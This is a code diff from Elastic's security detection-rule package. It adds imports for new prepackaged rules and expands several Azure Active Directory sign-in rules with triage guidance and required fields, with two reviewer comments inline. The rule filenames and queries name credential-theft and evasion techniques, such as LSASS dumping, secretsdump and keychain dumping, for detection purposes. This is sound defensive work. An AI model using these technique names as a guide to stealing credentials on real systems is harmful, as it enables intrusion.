'./initial_access_azure_active_directory_powershell_signin.json'; +import rule447 from './collection_email_powershell_exchange_mailbox.json'; +import rule448 from './execution_scheduled_task_powershell_source.json'; +import rule449 from './persistence_powershell_exch_mailbox_activesync_add_device.json'; +import rule450 from './persistence_docker_shortcuts_plist_modification.json'; +import rule451 from './persistence_evasion_hidden_local_account_creation.json'; +import rule452 from './persistence_finder_sync_plugin_pluginkit.json'; +import rule453 from './discovery_security_software_grep.json'; +import rule454 from './credential_access_cookies_chromium_browsers_debugging.json'; +import rule455 from './credential_access_ssh_backdoor_log.json'; +import rule456 from './persistence_credential_access_modify_auth_module_or_config.json'; +import rule457 from './persistence_credential_access_modify_ssh_binaries.json'; +import rule458 from './credential_access_collection_sensitive_files.json'; +import rule459 from './persistence_ssh_authorized_keys_modification.json'; +import rule460 from './defense_evasion_defender_disabled_via_registry.json'; +import rule461 from './defense_evasion_privacy_controls_tcc_database_modification.json'; +import rule462 from './execution_initial_access_suspicious_browser_childproc.json'; +import rule463 from './execution_script_via_automator_workflows.json'; +import rule464 from './persistence_modification_sublime_app_plugin_or_script.json'; +import rule465 from './privilege_escalation_applescript_with_admin_privs.json'; +import rule466 from './credential_access_dumping_keychain_security.json'; +import rule467 from './initial_access_azure_active_directory_high_risk_signin.json'; +import rule468 from './initial_access_suspicious_mac_ms_office_child_process.json'; +import rule469 from './credential_access_mitm_localhost_webproxy.json'; +import rule470 from './persistence_kde_autostart_modification.json'; +import rule471 from 
'./persistence_user_account_added_to_privileged_group_ad.json'; +import rule472 from './defense_evasion_attempt_to_disable_gatekeeper.json'; +import rule473 from './defense_evasion_sandboxed_office_app_suspicious_zip_file.json'; +import rule474 from './persistence_emond_rules_file_creation.json'; +import rule475 from './persistence_emond_rules_process_execution.json'; +import rule476 from './discovery_users_domain_built_in_commands.json'; +import rule477 from './execution_pentest_eggshell_remote_admin_tool.json'; +import rule478 from './defense_evasion_install_root_certificate.json'; +import rule479 from './persistence_credential_access_authorization_plugin_creation.json'; +import rule480 from './persistence_directory_services_plugins_modification.json'; +import rule481 from './defense_evasion_modify_environment_launchctl.json'; +import rule482 from './defense_evasion_safari_config_change.json'; +import rule483 from './defense_evasion_apple_softupdates_modification.json'; +import rule484 from './credential_access_mod_wdigest_security_provider.json'; +import rule485 from './credential_access_saved_creds_vaultcmd.json'; +import rule486 from './defense_evasion_file_creation_mult_extension.json'; +import rule487 from './execution_enumeration_via_wmiprvse.json'; +import rule488 from './execution_suspicious_jar_child_process.json'; +import rule489 from './persistence_shell_profile_modification.json'; +import rule490 from './persistence_suspicious_calendar_modification.json'; +import rule491 from './persistence_time_provider_mod.json'; +import rule492 from './privilege_escalation_exploit_adobe_acrobat_updater.json'; +import rule493 from './defense_evasion_sip_provider_mod.json'; +import rule494 from './execution_com_object_xwizard.json'; +import rule495 from './privilege_escalation_disable_uac_registry.json'; +import rule496 from './defense_evasion_unusual_ads_file_creation.json'; +import rule497 from './persistence_loginwindow_plist_modification.json'; +import rule498 
from './persistence_periodic_tasks_file_mdofiy.json'; +import rule499 from './persistence_via_atom_init_file_modification.json'; +import rule500 from './privilege_escalation_lsa_auth_package.json'; +import rule501 from './privilege_escalation_port_monitor_print_pocessor_abuse.json'; +import rule502 from './credential_access_dumping_hashes_bi_cmds.json'; +import rule503 from './lateral_movement_mounting_smb_share.json'; +import rule504 from './privilege_escalation_echo_nopasswd_sudoers.json'; +import rule505 from './privilege_escalation_ld_preload_shared_object_modif.json'; +import rule506 from './privilege_escalation_root_crontab_filemod.json'; +import rule507 from './defense_evasion_create_mod_root_certificate.json'; +import rule508 from './privilege_escalation_sudo_buffer_overflow.json'; +import rule509 from './execution_installer_package_spawned_network_event.json'; +import rule510 from './initial_access_suspicious_ms_exchange_files.json'; +import rule511 from './initial_access_suspicious_ms_exchange_process.json'; +import rule512 from './initial_access_suspicious_ms_exchange_worker_child_process.json'; +import rule513 from './persistence_evasion_registry_startup_shell_folder_modified.json'; +import rule514 from './persistence_local_scheduled_job_creation.json'; +import rule515 from './persistence_via_wmi_stdregprov_run_services.json'; +import rule516 from './credential_access_persistence_network_logon_provider_modification.json'; +import rule517 from './lateral_movement_defense_evasion_lanman_nullsessionpipe_modification.json'; +import rule518 from './collection_microsoft_365_new_inbox_rule.json'; +import rule519 from './ml_high_count_network_denies.json'; +import rule520 from './ml_high_count_network_events.json'; +import rule521 from './ml_rare_destination_country.json'; +import rule522 from './ml_spike_in_traffic_to_a_country.json'; +import rule523 from './command_and_control_tunneling_via_earthworm.json'; +import rule524 from 
'./lateral_movement_evasion_rdp_shadowing.json'; +import rule525 from './threat_intel_fleet_integrations.json'; +import rule526 from './exfiltration_ec2_vm_export_failure.json'; +import rule527 from './exfiltration_ec2_full_network_packet_capture_detected.json'; +import rule528 from './impact_azure_service_principal_credentials_added.json'; +import rule529 from './persistence_ec2_security_group_configuration_change_detection.json'; +import rule530 from './defense_evasion_disabling_windows_logs.json'; +import rule531 from './persistence_route_53_domain_transfer_lock_disabled.json'; +import rule532 from './persistence_route_53_domain_transferred_to_another_account.json'; +import rule533 from './initial_access_okta_user_attempted_unauthorized_access.json'; +import rule534 from './credential_access_user_excessive_sso_logon_errors.json'; +import rule535 from './persistence_exchange_suspicious_mailbox_right_delegation.json'; +import rule536 from './privilege_escalation_new_or_modified_federation_domain.json'; +import rule537 from './privilege_escalation_sts_assumerole_usage.json'; +import rule538 from './privilege_escalation_sts_getsessiontoken_abuse.json'; +import rule539 from './defense_evasion_suspicious_execution_from_mounted_device.json'; +import rule540 from './defense_evasion_unusual_network_connection_via_dllhost.json'; +import rule541 from './defense_evasion_amsienable_key_mod.json'; +import rule542 from './impact_rds_group_deletion.json'; +import rule543 from './persistence_rds_group_creation.json'; +import rule544 from './persistence_route_table_created.json'; +import rule545 from './persistence_route_table_modified_or_deleted.json'; +import rule546 from './exfiltration_rds_snapshot_export.json'; +import rule547 from './persistence_rds_instance_creation.json'; +import rule548 from './privilege_escalation_gcp_kubernetes_rolebindings_created_or_patched.json'; +import rule549 from './credential_access_ml_auth_spike_in_failed_logon_events.json'; +import rule550 
from './credential_access_ml_auth_spike_in_logon_events.json';
+import rule551 from './credential_access_ml_auth_spike_in_logon_events_from_a_source_ip.json';
+import rule552 from './initial_access_ml_auth_rare_hour_for_a_user_to_logon.json';
+import rule553 from './initial_access_ml_auth_rare_source_ip_for_a_user.json';
+import rule554 from './initial_access_ml_auth_rare_user_logon.json';
+import rule555 from './privilege_escalation_cyberarkpas_error_audit_event_promotion.json';
+import rule556 from './privilege_escalation_cyberarkpas_recommended_events_to_monitor_promotion.json';
+import rule557 from './defense_evasion_kubernetes_events_deleted.json';
+import rule558 from './impact_kubernetes_pod_deleted.json';
+import rule559 from './exfiltration_rds_snapshot_restored.json';
+import rule560 from './privilege_escalation_printspooler_suspicious_file_deletion.json';
+import rule561 from './privilege_escalation_unusual_printspooler_childprocess.json';
+import rule562 from './defense_evasion_disabling_windows_defender_powershell.json';
+import rule563 from './defense_evasion_enable_network_discovery_with_netsh.json';
+import rule564 from './defense_evasion_execution_windefend_unusual_path.json';
+import rule565 from './defense_evasion_agent_spoofing_mismatched_id.json';
+import rule566 from './defense_evasion_agent_spoofing_multiple_hosts.json';
+import rule567 from './defense_evasion_parent_process_pid_spoofing.json';
+import rule568 from './impact_microsoft_365_potential_ransomware_activity.json';
+import rule569 from './impact_microsoft_365_unusual_volume_of_file_deletion.json';
+import rule570 from './initial_access_microsoft_365_user_restricted_from_sending_email.json';
+import rule571 from './defense_evasion_elasticache_security_group_creation.json';
+import rule572 from './defense_evasion_elasticache_security_group_modified_or_deleted.json';
+import rule573 from './impact_volume_shadow_copy_deletion_via_powershell.json';
+import rule574 from 
'./persistence_route_53_hosted_zone_associated_with_a_vpc.json';
+import rule575 from './defense_evasion_defender_exclusion_via_powershell.json';
+import rule576 from './defense_evasion_dns_over_https_enabled.json';
+import rule577 from './defense_evasion_frontdoor_firewall_policy_deletion.json';
+import rule578 from './credential_access_azure_full_network_packet_capture_detected.json';
+import rule579 from './persistence_webshell_detection.json';
+import rule580 from './defense_evasion_suppression_rule_created.json';
+import rule581 from './impact_efs_filesystem_or_mount_deleted.json';
+import rule582 from './defense_evasion_execution_control_panel_suspicious_args.json';
+import rule583 from './defense_evasion_azure_blob_permissions_modified.json';
+import rule584 from './privilege_escalation_aws_suspicious_saml_activity.json';
+import rule585 from './credential_access_potential_lsa_memdump_via_mirrordump.json';
+import rule586 from './discovery_virtual_machine_fingerprinting_grep.json';
+import rule587 from './impact_backup_file_deletion.json';
+import rule588 from './credential_access_posh_minidump.json';
+import rule589 from './persistence_screensaver_engine_unexpected_child_process.json';
+import rule590 from './persistence_screensaver_plist_file_modification.json';
+import rule591 from './credential_access_suspicious_lsass_access_memdump.json';
+import rule592 from './defense_evasion_suspicious_process_access_direct_syscall.json';
+import rule593 from './discovery_posh_suspicious_api_functions.json';
+import rule594 from './privilege_escalation_via_rogue_named_pipe.json';
+import rule595 from './credential_access_suspicious_lsass_access_via_snapshot.json';
+import rule596 from './defense_evasion_posh_process_injection.json';
+import rule597 from './collection_posh_keylogger.json';
+import rule598 from './defense_evasion_posh_assembly_load.json';
+import rule599 from './defense_evasion_powershell_windows_firewall_disabled.json';
+import rule600 from 
'./execution_posh_portable_executable.json';
+import rule601 from './execution_posh_psreflect.json';
+import rule602 from './credential_access_suspicious_comsvcs_imageload.json';
+import rule603 from './impact_aws_eventbridge_rule_disabled_or_deleted.json';
+import rule604 from './defense_evasion_microsoft_defender_tampering.json';
+import rule605 from './initial_access_azure_active_directory_high_risk_signin_atrisk_or_confirmed.json';
+import rule606 from './persistence_remote_password_reset.json';
+import rule607 from './privilege_escalation_azure_kubernetes_rolebinding_created.json';
+import rule608 from './collection_posh_audio_capture.json';
+import rule609 from './collection_posh_screen_grabber.json';
+import rule610 from './defense_evasion_posh_compressed.json';
+import rule611 from './defense_evasion_suspicious_process_creation_calltrace.json';
+import rule612 from './privilege_escalation_group_policy_iniscript.json';
+import rule613 from './privilege_escalation_group_policy_privileged_groups.json';
+import rule614 from './privilege_escalation_group_policy_scheduled_task.json';
+import rule615 from './defense_evasion_clearing_windows_console_history.json';
+import rule616 from './threat_intel_filebeat8x.json';
+import rule617 from './privilege_escalation_installertakeover.json';
+import rule618 from './credential_access_via_snapshot_lsass_clone_creation.json';
+import rule619 from './persistence_via_bits_job_notify_command.json';
+import rule620 from './execution_suspicious_java_netcon_childproc.json';
+import rule621 from './privilege_escalation_samaccountname_spoofing_attack.json';
+import rule622 from './credential_access_symbolic_link_to_shadow_copy_created.json';
+import rule623 from './credential_access_mfa_push_brute_force.json';
+import rule624 from './persistence_azure_global_administrator_role_assigned.json';
+import rule625 from './persistence_microsoft_365_global_administrator_role_assign.json';
+import rule626 from 
'./lateral_movement_malware_uploaded_onedrive.json';
+import rule627 from './lateral_movement_malware_uploaded_sharepoint.json';
+import rule628 from './defense_evasion_ms_office_suspicious_regmod.json';
+import rule629 from './initial_access_o365_user_reported_phish_malware.json';
+import rule630 from './defense_evasion_microsoft_365_mailboxauditbypassassociation.json';
+import rule631 from './credential_access_disable_kerberos_preauth.json';
+import rule632 from './credential_access_posh_request_ticket.json';
+import rule633 from './credential_access_shadow_credentials.json';
+import rule634 from './privilege_escalation_pkexec_envar_hijack.json';
+import rule635 from './credential_access_seenabledelegationprivilege_assigned_to_user.json';
+import rule636 from './persistence_msds_alloweddelegateto_krbtgt.json';
+import rule637 from './defense_evasion_disable_posh_scriptblocklogging.json';
+import rule638 from './persistence_ad_adminsdholder.json';
+import rule639 from './privilege_escalation_windows_service_via_unusual_client.json';
+import rule640 from './credential_access_dcsync_replication_rights.json';
+import rule641 from './credential_access_lsass_memdump_handle_access.json';
+import rule642 from './credential_access_moving_registry_hive_via_smb.json';
+import rule643 from './credential_access_suspicious_winreg_access_via_sebackup_priv.json';
+import rule644 from './credential_access_spn_attribute_modified.json';
+import rule645 from './persistence_dontexpirepasswd_account.json';
+import rule646 from './persistence_sdprop_exclusion_dsheuristics.json';
+import rule647 from './credential_access_remote_sam_secretsdump.json';
+import rule648 from './defense_evasion_workfolders_control_execution.json';
+import rule649 from './credential_access_user_impersonation_access.json';
+import rule650 from './persistence_redshift_instance_creation.json';
+import rule651 from './persistence_crontab_creation.json';
+import rule652 from 
'./privilege_escalation_krbrelayup_service_creation.json';
+import rule653 from './credential_access_relay_ntlm_auth_via_http_spoolss.json';
+import rule654 from './execution_shell_evasion_linux_binary.json';
+import rule655 from './execution_process_started_in_shared_memory_directory.json';
+import rule656 from './execution_abnormal_process_id_file_created.json';
+import rule657 from './execution_process_started_from_process_id_file.json';
+import rule658 from './privilege_escalation_suspicious_dnshostname_update.json';
+import rule659 from './command_and_control_connection_attempt_by_non_ssh_root_session.json';
+import rule660 from './execution_user_exec_to_pod.json';
+import rule661 from './defense_evasion_elastic_agent_service_terminated.json';
+import rule662 from './defense_evasion_proxy_execution_via_msdt.json';
+import rule663 from './discovery_enumerating_domain_trusts_via_nltest.json';
+import rule664 from './credential_access_lsass_handle_via_malseclogon.json';
+import rule665 from './discovery_suspicious_self_subject_review.json';
+import rule666 from './initial_access_evasion_suspicious_htm_file_creation.json';
+import rule667 from './persistence_exposed_service_created_with_type_nodeport.json';
+import rule668 from './privilege_escalation_pod_created_with_hostipc.json';
+import rule669 from './privilege_escalation_pod_created_with_hostnetwork.json';
+import rule670 from './privilege_escalation_pod_created_with_hostpid.json';
+import rule671 from './privilege_escalation_privileged_pod_created.json';
+import rule672 from './execution_tc_bpf_filter.json';
+import rule673 from './persistence_insmod_kernel_module_load.json';
+import rule674 from './privilege_escalation_pod_created_with_sensitive_hospath_volume.json';
+import rule675 from './persistence_dynamic_linker_backup.json';
+import rule676 from './defense_evasion_hidden_shared_object.json';
+import rule677 from './defense_evasion_chattr_immutable_file.json';
+import rule678 from 
'./persistence_chkconfig_service_add.json';
+import rule679 from './persistence_etc_file_creation.json';
+import rule680 from './impact_process_kill_threshold.json';
 export const rawRules = [
 rule1,
@@ -1358,4 +1365,11 @@ export const rawRules = [
 rule671,
 rule672,
 rule673,
+ rule674,
+ rule675,
+ rule676,
+ rule677,
+ rule678,
+ rule679,
+ rule680,
 ];
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_azure_active_directory_high_risk_signin.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_azure_active_directory_high_risk_signin.json
index 5abbbb1b1c6ed..fe32a291138b4 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_azure_active_directory_high_risk_signin.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_azure_active_directory_high_risk_signin.json
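Review bot: The new entry `rule674` registered in this hunk is bound, in the preceding import hunk, to `privilege_escalation_pod_created_with_sensitive_hospath_volume.json`, where `hospath` reads as a misspelling of `hostpath` (the neighbouring `rule668`–`rule670` imports spell `hostipc`, `hostnetwork` and `hostpid` correctly). The import only resolves if the JSON file carries the same misspelled name, so this presumably works as committed, but it bakes the typo into the rule index and the shipped asset name. If the rule files are synced from an upstream source, it is worth raising there so that the next sync renames the file and this import together. The import hunk that binds `rule674` starts outside this view.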
@@ -12,15 +12,44 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Azure Active Directory High Risk Sign-in",
- "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "## Triage and analysis\n\n### Investigating Azure Active Directory High Risk Sign-in\n\nMicrosoft Identity Protection is an Azure AD security tool that detects various types of identity risks and attacks.\n\nThis rule identifies events produced by Microsoft Identity Protection with high risk levels or high aggregated risk level.\n\n#### Possible investigation steps\n\n- Identify the Risk Detection that triggered the event. A list with descriptions can be found [here](https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#risk-types-and-detection).\n- Identify the user account involved and validate whether the suspicious activity is normal for that user. \n - Consider the source IP address and geolocation for the involved user account. Do they look normal?\n - Consider the device used to sign in. 
Is it registered and compliant?\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\nIf this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a\ncombination of user and device conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. 
Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other\nIAM users.\n- Consider enabling multi-factor authentication for users.\n- Follow security best practices [outlined](https://docs.microsoft.com/en-us/azure/security/fundamentals/identity-management-best-practices) by Microsoft.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).",
 "query": "event.dataset:azure.signinlogs and\n (azure.signinlogs.properties.risk_level_during_signin:high or azure.signinlogs.properties.risk_level_aggregated:high) and\n event.outcome:(success or Success)\n",
 "references": [
 "https://docs.microsoft.com/en-us/azure/active-directory/conditional-access/howto-conditional-access-policy-risk",
 "https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/overview-identity-protection",
 "https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/howto-identity-protection-investigate-risk"
 ],
+ "related_integrations": [
+ {
+ "package": "azure",
+ "version": "0.12.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": false,
+ "name": "azure.signinlogs.properties.risk_level_aggregated",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "azure.signinlogs.properties.risk_level_during_signin",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "37994bca-0611-4500-ab67-5588afe73b77",
+ "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\nNote that details for 
`azure.signinlogs.properties.risk_level_during_signin` and `azure.signinlogs.properties.risk_level_aggregated`\nare only available for Azure AD Premium P2 customers. All other customers will be returned `hidden`.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -49,5 +78,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 3
+ "version": 5
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_azure_active_directory_high_risk_signin_atrisk_or_confirmed.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_azure_active_directory_high_risk_signin_atrisk_or_confirmed.json
index 9a588422fcf35..3b81be30bff10 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_azure_active_directory_high_risk_signin_atrisk_or_confirmed.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_azure_active_directory_high_risk_signin_atrisk_or_confirmed.json
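Review bot: The `setup` text added at the end of this hunk says that tenants without Azure AD Premium P2 get `hidden` back for the two risk-level fields, but it leaves the consequence implicit: the query matches only `high`, so in those tenants the rule installs cleanly yet can never alert. A defender enabling the rule should be told that directly rather than having to infer it from the query; ending the sentence with `All other customers will be returned hidden, so this rule will not produce alerts in those tenants.` (keeping the existing code formatting around `hidden`) would do. The `required_fields` entries already mark both fields as non-ECS, which is consistent with the query.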
@@ -11,15 +11,40 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Azure Active Directory High Risk User Sign-in Heuristic",
- "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "## Triage and analysis\n\n### Investigating Azure Active Directory High Risk User Sign-in Heuristic\n\nMicrosoft Identity Protection is an Azure AD security tool that detects various types of identity risks and attacks.\n\nThis rule identifies events produced by the Microsoft Identity Protection with a risk state equal to `confirmedCompromised`\nor `atRisk`.\n\n#### Possible investigation steps\n\n- Identify the Risk Detection that triggered the event. A list with descriptions can be found [here](https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#risk-types-and-detection).\n- Identify the user account involved and validate whether the suspicious activity is normal for that user. \n - Consider the source IP address and geolocation for the involved user account. Do they look normal?\n - Consider the device used to sign in. 
Is it registered and compliant?\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\nIf this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a\ncombination of user and device conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. 
Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other\nIAM users.\n- Consider enabling multi-factor authentication for users.\n- Follow security best practices [outlined](https://docs.microsoft.com/en-us/azure/security/fundamentals/identity-management-best-practices) by Microsoft.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).",
 "query": "event.dataset:azure.signinlogs and\n azure.signinlogs.properties.risk_state:(\"confirmedCompromised\" or \"atRisk\") and event.outcome:(success or Success)\n",
 "references": [
 "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-azure-monitor-sign-ins-log-schema",
 "https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/overview-identity-protection",
- "https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/howto-identity-protection-investigate-risk"
+ "https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/howto-identity-protection-investigate-risk",
+ "https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/howto-identity-protection-investigate-risk#investigation-framework"
+ ],
+ "related_integrations": [
+ {
+ "package": "azure",
+ "version": "0.12.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": false,
+ "name": "azure.signinlogs.properties.risk_state",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ }
 ],
 "risk_score": 47,
 "rule_id": "26edba02-6979-4bce-920a-70b080a7be81",
+ "setup": "The Azure Fleet integration, Filebeat 
module, or similarly structured data is required to be compatible with this rule.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -48,5 +73,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 1
+ "version": 3
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_azure_active_directory_powershell_signin.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_azure_active_directory_powershell_signin.json
index 207d5534efd79..bb8061aa542e1 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_azure_active_directory_powershell_signin.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_azure_active_directory_powershell_signin.json
@@ -14,14 +14,43 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Azure Active Directory PowerShell Sign-in",
- "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "## Triage and analysis\n\n### Investigating Azure Active Directory PowerShell Sign-in\n\nAzure Active Directory PowerShell for Graph (Azure AD PowerShell) is a module IT professionals commonly use to manage\ntheir Azure Active Directory. The cmdlets in the Azure AD PowerShell module enable you to retrieve data from the\ndirectory, create new objects in the directory, update existing objects, remove objects, as well as configure the\ndirectory and its features.\n\nThis rule identifies sign-ins that use the Azure Active Directory PowerShell module, which can indicate unauthorized\naccess if done outside of IT or engineering.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Evaluate whether the user needs to access Azure AD using PowerShell to complete its tasks.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Consider the source IP address and geolocation for the involved user account. 
Do they look normal?\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate suspicious actions taken by the user using the module, for example, modifications in security settings\nthat weakens the security policy, persistence-related tasks, and data access.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding IT, Engineering, and other authorized users\nas exceptions \u2014 preferably with a combination of user and device conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. 
Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other\nIAM users.\n- Consider enabling multi-factor authentication for users.\n- Follow security best practices [outlined](https://docs.microsoft.com/en-us/azure/security/fundamentals/identity-management-best-practices) by Microsoft.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).",
 "query": "event.dataset:azure.signinlogs and\n azure.signinlogs.properties.app_display_name:\"Azure Active Directory PowerShell\" and\n azure.signinlogs.properties.token_issuer_type:AzureAD and event.outcome:(success or Success)\n",
 "references": [
 "https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/",
 "https://docs.microsoft.com/en-us/microsoft-365/enterprise/connect-to-microsoft-365-powershell?view=o365-worldwide"
 ],
+ "related_integrations": [
+ {
+ "package": "azure",
+ "version": "0.12.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": false,
+ "name": "azure.signinlogs.properties.app_display_name",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "azure.signinlogs.properties.token_issuer_type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "a605c51a-73ad-406d-bf3a-f24cc41d5c97",
+ "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -57,5 +86,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 4
+ "version": 6
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_consent_grant_attack_via_azure_registered_application.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_consent_grant_attack_via_azure_registered_application.json
index 45acc46fcd49d..3718b800156d7 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_consent_grant_attack_via_azure_registered_application.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_consent_grant_attack_via_azure_registered_application.json
@@ -11,13 +11,58 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Possible Consent Grant Attack via Azure-Registered Application",
- "note": "## Triage and analysis\n\n- In a consent grant attack, an attacker tricks an end user into granting a malicious application consent to access their data, usually via a phishing attack. After the malicious application has been granted consent, it has account-level access to data without the need for an organizational account.\n- Normal remediation steps, like resetting passwords for breached accounts or requiring Multi-Factor Authentication (MFA) on accounts, are not effective against this type of attack, since these are third-party applications and are external to the organization.\n- Security analysts should review the list of trusted applications for any suspicious items.\n\n\n## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
- "query": "event.dataset:(azure.activitylogs or azure.auditlogs or o365.audit) and \n (\n azure.activitylogs.operation_name:\"Consent to application\" or\n azure.auditlogs.operation_name:\"Consent to application\" or\n o365.audit.Operation:\"Consent to application.\"\n ) and\n event.outcome:(Success or success)\n",
